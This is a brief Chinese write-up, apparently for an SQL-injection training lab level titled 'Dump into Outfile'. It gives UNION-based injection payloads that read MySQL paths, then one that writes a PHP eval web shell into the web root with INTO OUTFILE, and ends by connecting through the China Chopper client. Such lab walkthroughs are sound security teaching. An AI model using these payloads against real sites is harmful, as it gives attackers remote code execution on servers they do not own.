(1)查看PHP源代码
可以看见输入的id被一对单引号和两对圆括号包围
(2)根据提示:Dump into Outfile可知,此次攻击需要导出文件
(3)在第一关获取
@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径
?id=2' union select 1,@@datadir,@@basedir --+
(4)修改MySql配置,以让能在D盘写入文件(MySQL->my.ini)
(5)payload如下
?id=1')) union select 1,'2','<?php @eval($_POST["cmd"]);?>' into outfile 'D:\phpStudy\PHPTutorial\WWW\1234.php' --+
尽管显示错误,但在所写目录里有已经写好了文件
(6)运行中国菜刀
至此,攻击完成!